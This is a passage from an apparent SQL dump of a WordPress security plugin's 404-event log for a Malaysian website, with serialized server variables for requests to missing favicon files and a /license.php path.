\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570632698.7438\";s:12:\"REQUEST_TIME\";s:10:\"1570632698\";}}','notice','2019-10-09 14:51:42','2019-10-09 14:51:39',35434168,37239344,'https://bintara.com.my/license.php',1,0,'193.106.30.99'),(27789,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/license.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/license.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/license.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ3z@gyq3KpmTg5qzE5ZTgAAAMw\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/license.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/license.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ3z@gyq3KpmTg5qzE5ZTgAAAMw\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"193.106.30.99\";s:11:\"REMOTE_PORT\";s:5:\"43498\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/license.php\";s:10:\"SCRIPT_URL\";s:12:\"/license.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ3z@gyq3KpmTg5qzE5ZTgAAAMw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570632698.5675\";s:12:\"REQUEST_TIME\";s:10:\"1570632698\";}}','notice','2019-10-09 14:51:41','2019-10-09 14:51:39',35046088,36849920,'https://bintara.com.my/license.php',1,0,'193.106.30.99'),(27788,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:56:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/logitech/favicon.ico\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:4:\"69-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:13:\"image/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"br, gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (iPad; CPU OS 12_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/19.1b16203 Mobile/15E148 Safari/605.1.15\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"69-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/logitech/favicon.ico\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/logitech/favicon.ico\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ3wICFP7p535BJctBasjQAAAAE\";s:12:\"REDIRECT_URL\";s:21:\"/logitech/favicon.ico\";s:11:\"REMOTE_ADDR\";s:12:\"60.50.71.184\";s:11:\"REMOTE_PORT\";s:5:\"60278\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/logitech/favicon.ico\";s:10:\"SCRIPT_URL\";s:21:\"/logitech/favicon.ico\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ3wICFP7p535BJctBasjQAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570631712.3883\";s:12:\"REQUEST_TIME\";s:10:\"1570631712\";}}','notice','2019-10-09 14:35:14','2019-10-09 14:35:13',35053440,36858376,'https://bintara.com.my/logitech/favicon.ico',1,0,'60.50.71.184'),(27787,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:56:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:28:\"/western-digital/favicon.ico\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"206-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:13:\"image/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"br, gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (iPad; CPU OS 12_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/19.1b16203 Mobile/15E148 Safari/605.1.15\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"206-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:50:\"https://bintara.com.my/western-digital/favicon.ico\";s:19:\"REDIRECT_SCRIPT_URL\";s:28:\"/western-digital/favicon.ico\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ3wDgyq3KpmTg5qzE5Y9wAAAAE\";s:12:\"REDIRECT_URL\";s:28:\"/western-digital/favicon.ico\";s:11:\"REMOTE_ADDR\";s:12:\"60.50.71.184\";s:11:\"REMOTE_PORT\";s:5:\"60276\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:50:\"https://bintara.com.my/western-digital/favicon.ico\";s:10:\"SCRIPT_URL\";s:28:\"/western-digital/favicon.ico\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ3wDgyq3KpmTg5qzE5Y9wAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570631694.3477\";s:12:\"REQUEST_TIME\";s:10:\"1570631694\";}}','notice','2019-10-09 14:34:56','2019-10-09 14:34:54',35051944,36852056,'https://bintara.com.my/western-digital/favicon.ico',1,0,'60.50.71.184'),(27786,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:56:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/veeam/favicon.ico\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"130-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:13:\"image/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"br, gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (iPad; CPU OS 12_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/19.1b16203 Mobile/15E148 Safari/605.1.15\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"130-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/veeam/favicon.ico\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/veeam/favicon.ico\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ3v-Xs0xjDTAaZG0-jRfQAAAAE\";s:12:\"REDIRECT_URL\";s:18:\"/veeam/favicon.ico\";s:11:\"REMOTE_ADDR\";s:12:\"60.50.71.184\";s:11:\"REMOTE_PORT\";s:5:\"60274\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/veeam/favicon.ico\";s:10:\"SCRIPT_URL\";s:18:\"/veeam/favicon.ico\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ3v-Xs0xjDTAaZG0-jRfQAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570631677.503\";s:12:\"REQUEST_TIME\";s:10:\"1570631677\";}}','notice','2019-10-09 14:34:39','2019-10-09 14:34:37',35047128,36859600,'https://bintara.com.my/veeam/favicon.ico',1,0,'60.50.71.184'),(27785,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:56:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/sage/favicon.ico\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"149-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:13:\"image/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"br, gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (iPad; CPU OS 12_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/19.1b16203 Mobile/15E148 Safari/605.1.15\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"149-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/sage/favicon.ico\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/sage/favicon.ico\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ3v8Hs0xjDTAaZG0-jReQAAAAE\";s:12:\"REDIRECT_URL\";s:17:\"/sage/favicon.ico\";s:11:\"REMOTE_ADDR\";s:12:\"60.50.71.184\";s:11:\"REMOTE_PORT\";s:5:\"60272\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"https://bintara.com.my/sage/favicon.ico\";s:10:\"SCRIPT_URL\";s:17:\"/sage/favicon.ico\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ3v8Hs0xjDTAaZG0-jReQAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570631664.0921\";s:12:\"REQUEST_TIME\";s:10:\"1570631664\";}}','notice','2019-10-09 14:34:25','2019-10-09 14:34:24',35049840,36858128,'https://bintara.com.my/sage/favicon.ico',1,0,'60.50.71.184'),(27784,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:56:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/logitech/favicon.ico\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"325-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:13:\"image/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"br, gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (iPad; CPU OS 12_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/19.1b16203 Mobile/15E148 Safari/605.1.15\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"325-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/logitech/favicon.ico\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/logitech/favicon.ico\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ3vn4xV0SvqUWaw3AGxUAAAAAE\";s:12:\"REDIRECT_URL\";s:21:\"/logitech/favicon.ico\";s:11:\"REMOTE_ADDR\";s:12:\"60.50.71.184\";s:11:\"REMOTE_PORT\";s:5:\"60268\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/logitech/favicon.ico\";s:10:\"SCRIPT_URL\";s:21:\"/logitech/favicon.ico\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ3vn4xV0SvqUWaw3AGxUAAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570631583.1433\";s:12:\"REQUEST_TIME\";s:10:\"1570631583\";}}','notice','2019-10-09 14:33:05','2019-10-09 14:33:03',35051616,36857128,'https://bintara.com.my/logitech/favicon.ico',1,0,'60.50.71.184'),(27783,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:56:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/logitech/favicon.ico\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"128-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:13:\"image/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"br, gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (iPad; CPU OS 12_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/19.1b16203 Mobile/15E148 Safari/605.1.15\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"128-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/logitech/favicon.ico\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/logitech/favicon.ico\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ3vFXs0xjDTAaZG0-jRJgAAAAE\";s:12:\"REDIRECT_URL\";s:21:\"/logitech/favicon.ico\";s:11:\"REMOTE_ADDR\";s:12:\"60.50.71.184\";s:11:\"REMOTE_PORT\";s:5:\"60264\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/logitech/favicon.ico\";s:10:\"SCRIPT_URL\";s:21:\"/logitech/favicon.ico\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ3vFXs0xjDTAaZG0-jRJgAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570631445.1344\";s:12:\"REQUEST_TIME\";s:10:\"1570631445\";}}','notice','2019-10-09 14:30:46','2019-10-09 